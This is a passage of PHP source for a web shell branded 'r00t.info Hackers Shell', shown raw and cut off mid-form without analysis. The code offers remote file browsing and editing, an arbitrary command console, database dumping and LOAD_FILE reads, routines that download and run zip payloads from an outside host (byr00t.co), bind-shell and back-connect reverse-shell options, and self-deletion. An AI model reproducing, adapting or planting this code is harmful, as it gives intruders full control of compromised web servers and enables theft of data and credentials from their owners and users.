name=a value=\\\'FilesMan\\\'>\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <select name=\\\'p1\\\'><option value=\\\'copy\\\'>Copy</option><option value=\\\'move\\\'>Move</option><option value=\\\'delete\\\'>Delete</option>\';\r\n if(!empty($_SESSION[\'act\'])&&@count($_SESSION[\'f\'])){echo \'<option value=\\\'paste\\\'>Paste</option>\';\r\n } echo \'</select>&nbsp;\r\n<input type="submit" value=">>"></td><td colspan="2" align="right" width="1"><input name="def" value="r00t.info shell" disabled="disabled"/>&nbsp;\r\n<input type="submit" value="Add Deface Here" disabled="disabled"></td></tr>\r\n </form></table></div>\';\r\n printFooter();\r\n } function actionStringTools() { if(!function_exists(\'hex2bin\')) {function hex2bin($p) {return decbin(hexdec($p));\r\n}} if(!function_exists(\'hex2ascii\')) {function hex2ascii($p){$r=\'\';\r\nfor($i=0;\r\n$i<strLen($p);\r\n$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));\r\n}return $r;\r\n}} if(!function_exists(\'ascii2hex\')) {function ascii2hex($p){$r=\'\';\r\nfor($i=0;\r\n$i<strlen($p);\r\n++$i)$r.= dechex(ord($p[$i]));\r\nreturn strtoupper($r);\r\n}} if(!function_exists(\'full_urlencode\')) {function full_urlencode($p){$r=\'\';\r\nfor($i=0;\r\n$i<strlen($p);\r\n++$i)$r.= \'%\'.dechex(ord($p[$i]));\r\nreturn strtoupper($r);\r\n}} if(isset($_POST[\'ajax\'])) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n if(function_exists($_POST[\'p1\'])) echo $_POST[\'p1\']($_POST[\'p2\']);\r\n $temp = "document.getElementById(\'strOutput\').style.display=\'\';\r\ndocument.getElementById(\'strOutput\').innerHTML=\'".addcslashes(htmlspecialchars(ob_get_clean()),"\\n\\r\\t\\\\\'\\0")."\';\r\n\\n";\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n echo \'<h1>String conversions</h1><div class=content>\';\r\n $stringTools = array( \'Base64 encode\' => 
\'base64_encode\', \'Base64 decode\' => \'base64_decode\', \'Url encode\' => \'urlencode\', \'Url decode\' => \'urldecode\', \'Full urlencode\' => \'full_urlencode\', \'md5 hash\' => \'md5\', \'sha1 hash\' => \'sha1\', \'crypt\' => \'crypt\', \'CRC32\' => \'crc32\', \'ASCII to HEX\' => \'ascii2hex\', \'HEX to ASCII\' => \'hex2ascii\', \'HEX to DEC\' => \'hexdec\', \'HEX to BIN\' => \'hex2bin\', \'DEC to HEX\' => \'dechex\', \'DEC to BIN\' => \'decbin\', \'BIN to HEX\' => \'bin2hex\', \'BIN to DEC\' => \'bindec\', \'String to lower case\' => \'strtolower\', \'String to upper case\' => \'strtoupper\', \'Htmlspecialchars\' => \'htmlspecialchars\', \'String length\' => \'strlen\', );\r\n if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo "<form name=\'toolsForm\' onSubmit=\'if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);\r\n}else{g(null,null,this.selectTool.value,this.input.value);\r\n} return false;\r\n\'><select name=\'selectTool\'>";\r\n foreach($stringTools as $k => $v) echo "<option value=\'".htmlspecialchars($v)."\'>".$k."</option>";\r\n echo "</select><input type=\'submit\' value=\'>>\'/> <input type=checkbox name=ajax value=1 ".($_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\')."> send using AJAX<br><textarea name=\'input\' style=\'margin-top:5px\' class=bigarea>".htmlspecialchars(@$_POST[\'p2\'])."</textarea></form><pre class=\'ml1\' style=\'".(empty($_POST[\'p1\'])?\'display:none;\r\n\':\'\')."margin-top:5px\' id=\'strOutput\'>";\r\n if(!empty($_POST[\'p1\'])) { if(function_exists($_POST[\'p1\'])) echo htmlspecialchars($_POST[\'p1\']($_POST[\'p2\']));\r\n } echo"</pre></div>";\r\n printFooter();\r\n } function actionFilesTools() { if( isset($_POST[\'p1\']) ) $_POST[\'p1\'] = urldecode($_POST[\'p1\']);\r\n if(@$_POST[\'p2\']==\'download\') { if(is_file($_POST[\'p1\']) && is_readable($_POST[\'p1\'])) { ob_start("ob_gzhandler", 4096);\r\n 
header("Content-Disposition: attachment;\r\n filename=".basename($_POST[\'p1\']));\r\n if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST[\'p1\']);\r\n header("Content-Type: ".$type);\r\n } $fp = @fopen($_POST[\'p1\'], "r");\r\n if($fp) { while(!@feof($fp)) echo @fread($fp, 1024);\r\n fclose($fp);\r\n } } elseif(is_dir($_POST[\'p1\']) && is_readable($_POST[\'p1\'])) { } exit;\r\n } if( @$_POST[\'p2\'] == \'mkfile\' ) { if(!file_exists($_POST[\'p1\'])) { $fp = @fopen($_POST[\'p1\'], \'w\');\r\n if($fp) { $_POST[\'p2\'] = "edit";\r\n fclose($fp);\r\n } } } printHeader();\r\n echo \'<h1>File tools</h1><div class=content>\';\r\n if( !file_exists(@$_POST[\'p1\']) ) { echo \'File not exists\';\r\n printFooter();\r\n return;\r\n } $uid = @posix_getpwuid(@fileowner($_POST[\'p1\']));\r\n $gid = @posix_getgrgid(@fileowner($_POST[\'p1\']));\r\n echo \'<span>Name:</span> \'.htmlspecialchars($_POST[\'p1\']).\' <span>Size:</span> \'.(is_file($_POST[\'p1\'])?viewSize(filesize($_POST[\'p1\'])):\'-\').\' <span>Permission:</span> \'.viewPermsColor($_POST[\'p1\']).\' <span>Owner/Group:</span> \'.$uid[\'name\'].\'/\'.$gid[\'name\'].\'<br>\';\r\n echo \'<span>Create time:</span> \'.date(\'Y-m-d H:i:s\',filectime($_POST[\'p1\'])).\' <span>Access time:</span> \'.date(\'Y-m-d H:i:s\',fileatime($_POST[\'p1\'])).\' <span>Modify time:</span> \'.date(\'Y-m-d H:i:s\',filemtime($_POST[\'p1\'])).\'<br><br>\';\r\n if( empty($_POST[\'p2\']) ) $_POST[\'p2\'] = \'view\';\r\n if( is_file($_POST[\'p1\']) ) $m = array(\'View\', \'Highlight\', \'Download\', \'Hexdump\', \'Edit\', \'Chmod\', \'Rename\', \'Touch\');\r\n else $m = array(\'Chmod\', \'Rename\', \'Touch\');\r\n foreach($m as $v) echo \'<a href=# onclick="g(null,null,null,\\\'\'.strtolower($v).\'\\\')">\'.((strtolower($v)==@$_POST[\'p2\'])?\'<b>[ \'.$v.\' ]</b>\':$v).\'</a> \';\r\n echo \'<br><br>\';\r\n switch($_POST[\'p2\']) { case \'view\': echo \'<pre class=ml1>\';\r\n $fp = @fopen($_POST[\'p1\'], \'r\');\r\n 
if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024));\r\n @fclose($fp);\r\n } echo \'</pre>\';\r\n break;\r\n case \'highlight\': if( is_readable($_POST[\'p1\']) ) { echo \'<div class=ml1 style="background-color: #e1e1e1;\r\ncolor:black;\r\n">\';\r\n $code = highlight_file($_POST[\'p1\'],true);\r\n echo str_replace(array(\'<span \',\'</span>\'), array(\'<font \',\'</font>\'),$code).\'</div>\';\r\n } break;\r\n case \'chmod\': if( !empty($_POST[\'p3\']) ) { $perms = 0;\r\n for($i=strlen($_POST[\'p3\'])-1;\r\n$i>=0;\r\n--$i) $perms += (int)$_POST[\'p3\'][$i]*pow(8, (strlen($_POST[\'p3\'])-$i-1));\r\n if(!@chmod($_POST[\'p1\'], $perms)) echo \'Can\\\'t set permissions!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n else die(\'<script>g(null,null,null,null,"")</script>\');\r\n } echo \'<form onsubmit="g(null,null,null,null,this.chmod.value);\r\nreturn false;\r\n"><input type=text name=chmod value="\'.substr(sprintf(\'%o\', fileperms($_POST[\'p1\'])),-4).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'edit\': if( !is_writable($_POST[\'p1\'])) { echo \'File isn\\\'t writeable\';\r\n break;\r\n } if( !empty($_POST[\'p3\']) ) { @file_put_contents($_POST[\'p1\'],$_POST[\'p3\']);\r\n echo \'Saved!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n } echo \'<form onsubmit="g(null,null,null,null,this.text.value);\r\nreturn false;\r\n"><textarea name=text class=bigarea>\';\r\n $fp = @fopen($_POST[\'p1\'], \'r\');\r\n if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024));\r\n @fclose($fp);\r\n } echo \'</textarea><input type=submit value=">>"></form>\';\r\n break;\r\n case \'hexdump\': $c = @file_get_contents($_POST[\'p1\']);\r\n $n = 0;\r\n $h = array(\'00000000<br>\',\'\',\'\');\r\n $len = strlen($c);\r\n for ($i=0;\r\n $i<$len;\r\n ++$i) { $h[1] .= sprintf(\'%02X\',ord($c[$i])).\' \';\r\n switch ( ord($c[$i]) ) { case 0: $h[2] .= \' \';\r\n break;\r\n case 9: $h[2] .= \' \';\r\n break;\r\n case 10: $h[2] .= 
\' \';\r\n break;\r\n case 13: $h[2] .= \' \';\r\n break;\r\n default: $h[2] .= $c[$i];\r\n break;\r\n } $n++;\r\n if ($n == 32) { $n = 0;\r\n if ($i+1 < $len) {$h[0] .= sprintf(\'%08X\',$i+1).\'<br>\';\r\n} $h[1] .= \'<br>\';\r\n $h[2] .= "\\n";\r\n } } echo \'<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;\r\n"><pre>\'.$h[0].\'</pre></span></td><td bgcolor=#282828><pre>\'.$h[1].\'</pre></td><td bgcolor=#333333><pre>\'.htmlspecialchars($h[2]).\'</pre></td></tr></table>\';\r\n break;\r\n case \'rename\': if( !empty($_POST[\'p3\']) ) { if(!@rename($_POST[\'p1\'], $_POST[\'p3\'])) echo \'Can\\\'t rename!<br><script>document.mf.p3.value="";\r\n</script>\';\r\n else die(\'<script>g(null,null,"\'.urlencode($_POST[\'p3\']).\'",null,"")</script>\');\r\n } echo \'<form onsubmit="g(null,null,null,null,this.name.value);\r\nreturn false;\r\n"><input type=text name=name value="\'.htmlspecialchars($_POST[\'p1\']).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'touch\': if( !empty($_POST[\'p3\']) ) { $time = strtotime($_POST[\'p3\']);\r\n if($time) { if(@touch($_POST[\'p1\'],$time,$time)) die(\'<script>g(null,null,null,null,"")</script>\');\r\n else { echo \'Fail!<script>document.mf.p3.value="";\r\n</script>\';\r\n } } else echo \'Bad time format!<script>document.mf.p3.value="";\r\n</script>\';\r\n } echo \'<form onsubmit="g(null,null,null,null,this.touch.value);\r\nreturn false;\r\n"><input type=text name=touch value="\'.date("Y-m-d H:i:s", @filemtime($_POST[\'p1\'])).\'"><input type=submit value=">>"></form>\';\r\n break;\r\n case \'mkfile\': break;\r\n } echo \'</div>\';\r\n printFooter();\r\n } function actionBypass() { printHeader();\r\n if(!file_exists(\'cpanel/cpanel.php\')){ $dizin = \'https://byr00t.co/vb/cpanel.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? 
$name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "cpanel");\r\n $zip = new ZipArchive();\r\n $file = \'cpanel.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'cpanel/\');\r\n if(file_exists(\'cpanel.zip\')){ @unlink(\'cpanel.zip\');\r\n } if($cikar){ echo "<iframe src=cpanel/cpanel.php width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluştu.</div>\';\r\n } } elseif(file_exists(\'cpanel/cpanel.php\')){ echo "<iframe src=cpanel/cpanel.php width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionConsole() { if(isset($_POST[\'ajax\'])) { $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = true;\r\n ob_start();\r\n echo "document.cf.cmd.value=\'\';\r\n\\n";\r\n $temp = @iconv($_POST[\'charset\'], \'UTF-8\', addcslashes("\\n$ ".$_POST[\'p1\']."\\n".ex($_POST[\'p1\']),"\\n\\r\\t\\\\\'\\0"));\r\n if(preg_match("!.*cd\\s+([^;\r\n]+)$!",$_POST[\'p1\'],$match)) { if(@chdir($match[1])) { $GLOBALS[\'cwd\'] = @getcwd();\r\n echo "document.mf.c.value=\'".$GLOBALS[\'cwd\']."\';\r\n";\r\n } } echo "document.cf.output.value+=\'".$temp."\';\r\n";\r\n echo "document.cf.output.scrollTop = document.cf.output.scrollHeight;\r\n";\r\n $temp = ob_get_clean();\r\n echo strlen($temp), "\\n", $temp;\r\n exit;\r\n } printHeader();\r\n echo \'<script>\r\nif(window.Event) window.captureEvents(Event.KEYDOWN);\r\n\r\nvar cmds = new Array("");\r\n\r\nvar cur = 0;\r\n\r\nfunction kp(e) {\r\n var n = (window.Event) ? 
e.which : e.keyCode;\r\n\r\n if(n == 38) {\r\n cur--;\r\n\r\n if(cur>=0)\r\n document.cf.cmd.value = cmds[cur];\r\n\r\n else\r\n cur++;\r\n\r\n } else if(n == 40) {\r\n cur++;\r\n\r\n if(cur < cmds.length)\r\n document.cf.cmd.value = cmds[cur];\r\n\r\n else\r\n cur--;\r\n\r\n }\r\n}\r\nfunction add(cmd) {\r\n cmds.pop();\r\n\r\n cmds.push(cmd);\r\n\r\n cmds.push("");\r\n\r\n cur = cmds.length-1;\r\n\r\n}\r\n</script>\';\r\n echo \'<h1>Console</h1><div class=content><form name=cf onsubmit="if(document.cf.cmd.value==\\\'clear\\\'){document.cf.output.value=\\\'\\\';\r\ndocument.cf.cmd.value=\\\'\\\';\r\nreturn false;\r\n}add(this.cmd.value);\r\nif(this.ajax.checked){a(null,null,this.cmd.value);\r\n}else{g(null,null,this.cmd.value);\r\n} return false;\r\n"><select name=alias>\';\r\n foreach($GLOBALS[\'aliases\'] as $n => $v) { if($v == \'\') { echo \'<optgroup label="-\'.htmlspecialchars($n).\'-"></optgroup>\';\r\n continue;\r\n } echo \'<option value="\'.htmlspecialchars($v).\'">\'.$n.\'</option>\';\r\n } if(empty($_POST[\'ajax\'])&&!empty($_POST[\'p1\'])) $_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\'] = false;\r\n echo \'</select><input type=button onclick="add(document.cf.alias.value);\r\nif(document.cf.ajax.checked){a(null,null,document.cf.alias.value);\r\n}else{g(null,null,document.cf.alias.value);\r\n}" value=">>"> <input type=checkbox name=ajax value=1 \'.($_SESSION[md5($_SERVER[\'HTTP_HOST\']).\'ajax\']?\'checked\':\'\').\'> send using AJAX<br/><textarea class=bigarea name=output style="border-bottom:0;\r\n" readonly>\';\r\n if(!empty($_POST[\'p1\'])) { echo htmlspecialchars("$ ".$_POST[\'p1\']."\\n".ex($_POST[\'p1\']));\r\n } echo \'</textarea><input type=text name=cmd style="border-top:0;\r\nwidth:100%;\r\n" onkeydown="kp(event);\r\n">\';\r\n echo \'</form></div><script>document.cf.cmd.focus();\r\n</script>\';\r\n printFooter();\r\n } function actionLogout() { unset($_SESSION[md5($_SERVER[\'HTTP_HOST\'])]);\r\n echo \'\r\n <!--r00t.info Hackers Shell-->\r\n 
<!--Recoded by: Smurfie-->\r\n\r\n\r\n <script>alert("Logout Successful")</script>\r\n <body bgcolor=#ffffff><center><img src="http://r00t.info/shell-dosyalar/logo.png"></center>\r\n <H1><center><p style="color: #DF0101" >r00t.info Hackers Shell</p></H1>\r\n <center>\r\n<iframe src="http://www.facebook.com/plugins/likebox.php?\r\nhref=https://www.facebook.com/r00t.info&amp;\r\nwidth=260&amp;\r\ncolorsche\r\nme=light&amp;\r\nshow_faces=true&amp;\r\nborder_color=\r\n%23fff&amp;\r\nstream=false&amp;\r\nheader=false&amp;\r\nheight=100" scrolling="no" \r\nframeborder="0" style="background:transparent;\r\n border:none;\r\n overflow:hidden;\r\n width:200px;\r\n \r\nheight:100px;\r\n" allowtransparency="true"></iframe></center>\r\n <H3><marquee scrollamount="5" scrolldelay="50" width="100%"><p style="color: #DF0101" >Wso shell</p></marquee></H3></body>\';\r\n } function actionSelfRemove() { printHeader();\r\n if($_POST[\'p1\'] == \'yes\') { if(@unlink(SELF_PATH)) die(\'Shell has been removed\');\r\n else echo \'unlink error!\';\r\n } echo \'<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\\\'yes\\\')">Yes</a></div>\';\r\n printFooter();\r\n } function actionCgi() { printHeader();\r\n if(!file_exists(\'cgi/rot.cin\')){ $dizin = \'https://byr00t.co/vb/cgi.zip\';\r\n function dosya_indir($link,$name=null) { $link_info = pathinfo($link);\r\n $uzanti = strtolower($link_info[\'extension\']);\r\n $file = ($name) ? 
$name.\'.\'.$uzanti : $link_info[\'basename\'];\r\n $curl = curl_init($link);\r\n $fopen = fopen($file,\'w\');\r\n curl_setopt($curl, CURLOPT_HEADER,0);\r\n curl_setopt($curl, CURLOPT_RETURNTRANSFER,1);\r\n curl_setopt($curl, CURLOPT_HTTP_VERSION,CURL_HTTP_VERSION_1_0);\r\n curl_setopt($curl, CURLOPT_FILE, $fopen);\r\n curl_exec($curl);\r\n curl_close($curl);\r\n fclose($fopen);\r\n } dosya_indir($dizin, "cgi");\r\n $zip = new ZipArchive();\r\n $file = \'cgi.zip\';\r\n $zip->open($file);\r\n $cikar = $zip->extractTo(\'cgi/\');\r\n if(file_exists(\'cgi.zip\')){ @unlink(\'cgi.zip\');\r\n } if($cikar){ chmod(\'cgi/rot.cin\', 0755);\r\n echo "<iframe src=cgi/rot.cin width=100% height=100% frameborder=0></iframe> ";\r\n } else{ echo \'<div class="alert alert-danger"><strong>Hata!</strong> Dosya indirilirken kritik bir hata oluÅŸtu.</div>\';\r\n } } elseif(file_exists(\'cgi/rot.cin\')){ echo "<iframe src=cgi/rot.cin width=100% height=100% frameborder=0></iframe> ";\r\n } printFooter();\r\n } function actionSql() { class DbClass { var $type;\r\n var $link;\r\n var $res;\r\n function DbClass($type) { $this->type = $type;\r\n } function connect($host, $user, $pass, $dbname){ switch($this->type) { case \'mysql\': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;\r\n break;\r\n case \'pgsql\': $host = explode(\':\', $host);\r\n if(!$host[1]) $host[1]=5432;\r\n if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;\r\n break;\r\n } return false;\r\n } function selectdb($db) { switch($this->type) { case \'mysql\': if (@mysql_select_db($db))return true;\r\n break;\r\n } return false;\r\n } function query($str) { switch($this->type) { case \'mysql\': return $this->res = @mysql_query($str);\r\n break;\r\n case \'pgsql\': return $this->res = @pg_query($this->link,$str);\r\n break;\r\n } return false;\r\n } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res;\r\n 
switch($this->type) { case \'mysql\': return @mysql_fetch_assoc($res);\r\n break;\r\n case \'pgsql\': return @pg_fetch_assoc($res);\r\n break;\r\n } return false;\r\n } function listDbs() { switch($this->type) { case \'mysql\': return $this->res = @mysql_list_dbs($this->link);\r\n break;\r\n case \'pgsql\': return $this->res = $this->query("SELECT datname FROM pg_database");\r\n break;\r\n } return false;\r\n } function listTables() { switch($this->type) { case \'mysql\': return $this->res = $this->query(\'SHOW TABLES\');\r\n break;\r\n case \'pgsql\': return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != \'information_schema\' AND table_schema != \'pg_catalog\') or table_name = \'pg_user\'");\r\n break;\r\n } return false;\r\n } function error() { switch($this->type) { case \'mysql\': return @mysql_error($this->link);\r\n break;\r\n case \'pgsql\': return @pg_last_error($this->link);\r\n break;\r\n } return false;\r\n } function setCharset($str) { switch($this->type) { case \'mysql\': if(function_exists(\'mysql_set_charset\')) return @mysql_set_charset($str, $this->link);\r\n else $this->query(\'SET CHARSET \'.$str);\r\n break;\r\n case \'mysql\': return @pg_set_client_encoding($this->link, $str);\r\n break;\r\n } return false;\r\n } function dump($table) { switch($this->type) { case \'mysql\': $res = $this->query(\'SHOW CREATE TABLE `\'.$table.\'`\');\r\n $create = mysql_fetch_array($res);\r\n echo $create[1].";\r\n\\n\\n";\r\n $this->query(\'SELECT * FROM `\'.$table.\'`\');\r\n while($item = $this->fetch()) { $columns = array();\r\n foreach($item as $k=>$v) { $item[$k] = "\'".@mysql_real_escape_string($v)."\'";\r\n $columns[] = "`".$k."`";\r\n } echo \'INSERT INTO `\'.$table.\'` (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\r\n\'."\\n";\r\n } break;\r\n case \'pgsql\': $this->query(\'SELECT * FROM \'.$table);\r\n while($item = $this->fetch()) { $columns = array();\r\n foreach($item as 
$k=>$v) { $item[$k] = "\'".addslashes($v)."\'";\r\n $columns[] = $k;\r\n } echo \'INSERT INTO \'.$table.\' (\'.implode(", ", $columns).\') VALUES (\'.implode(", ", $item).\');\r\n\'."\\n";\r\n } break;\r\n } return false;\r\n } };\r\n $db = new DbClass(@$_POST[\'type\']);\r\n if(@$_POST[\'p2\']==\'download\') { ob_start("ob_gzhandler", 4096);\r\n $db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\']);\r\n $db->selectdb($_POST[\'sql_base\']);\r\n header("Content-Disposition: attachment;\r\n filename=dump.sql");\r\n header("Content-Type: text/plain");\r\n foreach($_POST[\'tbl\'] as $v) $db->dump($v);\r\n exit;\r\n } printHeader();\r\n echo \'<h1>Sql browser</h1><div class=content>\r\n <form name="sf" method="post">\r\n <table cellpadding="2" cellspacing="0">\r\n <tr>\r\n <td>Type</td>\r\n <td>Host</td>\r\n <td>Login</td>\r\n <td>Password</td>\r\n <td>Database</td>\r\n <td></td>\r\n </tr>\r\n <tr>\r\n <input type=hidden name=a value=Sql>\r\n <input type=hidden name=p1 value=\\\'query\\\'>\r\n <input type=hidden name=p2>\r\n <input type=hidden name=c value="\'.htmlspecialchars($GLOBALS[\'cwd\']).\'">\r\n <input type=hidden name=charset value="\'.(isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\').\'">\r\n <td>\r\n <select name=\\\'type\\\'>\r\n <option value="mysql" \'.(@$_POST[\'type\']==\'mysql\'?\'selected\':\'\').\'>MySql</option>\r\n <option value="pgsql" \'.(@$_POST[\'type\']==\'pgsql\'?\'selected\':\'\').\'>PostgreSql</option>\r\n </select></td>\r\n <td><input type=text name=sql_host value="\'.(empty($_POST[\'sql_host\'])?\'localhost\':htmlspecialchars($_POST[\'sql_host\'])).\'"></td>\r\n <td><input type=text name=sql_login value="\'.(empty($_POST[\'sql_login\'])?\'root\':htmlspecialchars($_POST[\'sql_login\'])).\'"></td>\r\n <td><input type=text name=sql_pass value="\'.(empty($_POST[\'sql_pass\'])?\'\':htmlspecialchars($_POST[\'sql_pass\'])).\'"></td>\r\n <td>\';\r\n $tmp = "<input type=text name=sql_base 
value=\'\'>";\r\n if(isset($_POST[\'sql_host\'])){ if($db->connect($_POST[\'sql_host\'], $_POST[\'sql_login\'], $_POST[\'sql_pass\'], $_POST[\'sql_base\'])) { switch($_POST[\'charset\']) { case "Windows-1251": $db->setCharset(\'cp1251\');\r\n break;\r\n case "UTF-8": $db->setCharset(\'utf8\');\r\n break;\r\n case "KOI8-R": $db->setCharset(\'koi8r\');\r\n break;\r\n case "KOI8-U": $db->setCharset(\'koi8u\');\r\n break;\r\n case "cp866": $db->setCharset(\'cp866\');\r\n break;\r\n } $db->listDbs();\r\n echo "<select name=sql_base><option value=\'\'></option>";\r\n while($item = $db->fetch()) { list($key, $value) = each($item);\r\n echo \'<option value="\'.$value.\'" \'.($value==$_POST[\'sql_base\']?\'selected\':\'\').\'>\'.$value.\'</option>\';\r\n } echo \'</select>\';\r\n } else echo $tmp;\r\n }else echo $tmp;\r\n echo \'</td>\r\n <td><input type=submit value=">>"></td>\r\n </tr>\r\n </table>\r\n <script>\r\n function st(t,l) {\r\n document.sf.p1.value = \\\'select\\\';\r\n\r\n document.sf.p2.value = t;\r\n\r\n if(l!=null)document.sf.p3.value = l;\r\n\r\n document.sf.submit();\r\n\r\n }\r\n function is() {\r\n for(i=0;\r\ni<document.sf.elements[\\\'tbl[]\\\'].length;\r\n++i)\r\n document.sf.elements[\\\'tbl[]\\\'][i].checked = !document.sf.elements[\\\'tbl[]\\\'][i].checked;\r\n\r\n }\r\n </script>\';\r\n if(isset($db) && $db->link){ echo "<br/><table width=100% cellpadding=2 cellspacing=0>";\r\n if(!empty($_POST[\'sql_base\'])){ $db->selectdb($_POST[\'sql_base\']);\r\n echo "<tr><td width=1 style=\'border-top:2px solid #666;\r\nborder-right:2px solid #666;\r\n\'><span>Tables:</span><br><br>";\r\n $tbls_res = $db->listTables();\r\n while($item = $db->fetch($tbls_res)) { list($key, $value) = each($item);\r\n $n = $db->fetch($db->query(\'SELECT COUNT(*) as n FROM \'.$value.\'\'));\r\n $value = htmlspecialchars($value);\r\n echo "<nobr><input type=\'checkbox\' name=\'tbl[]\' value=\'".$value."\'>&nbsp;\r\n<a href=# onclick=\\"st(\'".$value."\')\\">".$value."</a> 
(".$n[\'n\'].")</nobr><br>";\r\n } echo "<input type=\'checkbox\' onclick=\'is();\r\n\'> <input type=button value=\'Dump\' onclick=\'document.sf.p2.value=\\"download\\";\r\ndocument.sf.submit();\r\n\'></td><td style=\'border-top:2px solid #666;\r\n\'>";\r\n if(@$_POST[\'p1\'] == \'select\') { $_POST[\'p1\'] = \'query\';\r\n $db->query(\'SELECT COUNT(*) as n FROM \'.$_POST[\'p2\'].\'\');\r\n $num = $db->fetch();\r\n $num = $num[\'n\'];\r\n echo "<span>".$_POST[\'p2\']."</span> ($num) ";\r\n for($i=0;\r\n$i<($num/30);\r\n$i++) if($i != (int)$_POST[\'p3\']) echo "<a href=\'#\' onclick=\'st(\\"".$_POST[\'p2\']."\\", $i)\'>",($i+1),"</a> ";\r\n else echo ($i+1)," ";\r\n if($_POST[\'type\']==\'pgsql\') $_POST[\'p3\'] = \'SELECT * FROM \'.$_POST[\'p2\'].\' LIMIT 30 OFFSET \'.($_POST[\'p3\']*30);\r\n else $_POST[\'p3\'] = \'SELECT * FROM `\'.$_POST[\'p2\'].\'` LIMIT \'.($_POST[\'p3\']*30).\',30\';\r\n echo "<br><br>";\r\n } if((@$_POST[\'p1\'] == \'query\') && !empty($_POST[\'p3\'])) { $db->query(@$_POST[\'p3\']);\r\n if($db->res !== false) { $title = false;\r\n echo \'<table width=100% cellspacing=0 cellpadding=2 class=main>\';\r\n $line = 1;\r\n while($item = $db->fetch()) { if(!$title) { echo \'<tr>\';\r\n foreach($item as $key => $value) echo \'<th>\'.$key.\'</th>\';\r\n reset($item);\r\n $title=true;\r\n echo \'</tr><tr>\';\r\n $line = 2;\r\n } echo \'<tr class="l\'.$line.\'">\';\r\n $line = $line==1?2:1;\r\n foreach($item as $key => $value) { if($value == null) echo \'<td><i>null</i></td>\';\r\n else echo \'<td>\'.nl2br(htmlspecialchars($value)).\'</td>\';\r\n } echo \'</tr>\';\r\n } echo \'</table>\';\r\n } else { echo \'<div><b>Error:</b> \'.htmlspecialchars($db->error()).\'</div>\';\r\n } } echo "<br><textarea name=\'p3\' style=\'width:100%;\r\nheight:100px\'>".@htmlspecialchars($_POST[\'p3\'])."</textarea><br/><input type=submit value=\'Execute\'>";\r\n echo "</td></tr>";\r\n } echo "</table></form><br/><form 
onsubmit=\'document.sf.p1.value=\\"loadfile\\";\r\ndocument.sf.p2.value=this.f.value;\r\ndocument.sf.submit();\r\nreturn false;\r\n\'><span>Load file</span> <input class=\'toolsInp\' type=text name=f><input type=submit value=\'>>\'></form>";\r\n if(@$_POST[\'p1\'] == \'loadfile\') { $db->query("SELECT LOAD_FILE(\'".addslashes($_POST[\'p2\'])."\') as file");\r\n $file = $db->fetch();\r\n echo \'<pre class=ml1>\'.htmlspecialchars($file[\'file\']).\'</pre>\';\r\n } } echo \'</div>\';\r\n printFooter();\r\n } function actionNetwork() { printHeader();\r\n $back_connect_c="";\r\n $back_connect_p="";\r\n $bind_port_c="";\r\n $bind_port_p="";\r\n echo \'<h1>Network tools</h1><div class=content>\r\n <form name=\\\'nfp\\\' onSubmit="g(null,null,this.using.value,this.port.value,this.pass.value);\r\nreturn false;\r\n">\r\n <br /><span>Bind port to /bin/sh</span><br/>\r\n Port: <input type=\\\'text\\\' name=\\\'port\\\' value=\\\'443\\\'> Password: <input type=\\\'text\\\' name=\\\'pass\\\' value=\\\'smurf\\\'> Using: <select name="using"><option value=\\\'bpc\\\'>C</option><option value=\\\'bpp\\\'>Perl</option></select> <input type=submit value=">>">\r\n </form>\r\n <form name=\\\'nfp\\\' onSubmit="g(null,null,this.using.value,this.server.value,this.port.value);\r\nreturn false;\r\n">\r\n <br /><br /><span>Back-connect to</span><br/>\r\n Server: <input type=\\\'text\\\' name=\\\'server\\\' value="\'.$_SERVER[\'REMOTE_ADDR\'].\'"> Port: <input type=\\\'text\\\' name=\\\'port\\\' value=\\\'443\\\'> Using: <select name="using"><option value=\\\'bcc\\\'>C</option><option value=\\\'bcp\\\'>Perl</option></select> <input type=submit 